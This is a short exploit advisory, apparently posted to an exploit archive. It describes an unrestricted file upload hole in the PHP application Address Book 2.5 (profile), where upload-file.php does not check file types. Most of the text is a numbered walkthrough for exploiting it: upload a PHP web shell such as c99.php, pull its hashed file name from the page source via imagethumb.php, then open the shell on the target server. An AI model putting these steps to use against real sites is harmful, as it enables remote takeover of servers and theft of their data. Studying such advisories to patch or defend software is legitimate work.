Address Book 2.5 (profile) Remote Shell Upload Vulnerability bug found by Jose Luis Gongora Fernandez (a.k.a) JosS contact: sys-project[at] website: - download: - vuln file: upload-file.php The upload-file.php doesn't check the type of archive and you can uploaded the phpshell on the server. ~ [EXPLOITING] 1) /index2.php?title=add (upload your shell, ex: c99.php) 2) you should go to your "View Full Information" (ex: index2.php?title=fullview&id=150) 3) you view source code and search "profiles/imagethumb.php?s=" (ex: profiles/imagethumb.php? s=57b7b72739c79f02d990c4239c4169b9.php) 4) view shell: http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php __h0__